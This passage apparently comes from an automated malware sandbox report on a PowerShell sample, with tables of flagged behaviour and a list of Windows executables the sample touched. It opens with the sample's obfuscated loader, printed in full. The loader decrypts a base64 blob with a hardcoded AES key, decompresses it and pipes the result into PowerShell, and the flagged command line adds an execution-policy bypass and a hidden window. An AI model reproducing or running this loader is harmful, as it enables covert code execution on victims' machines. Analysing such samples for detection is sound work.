'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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |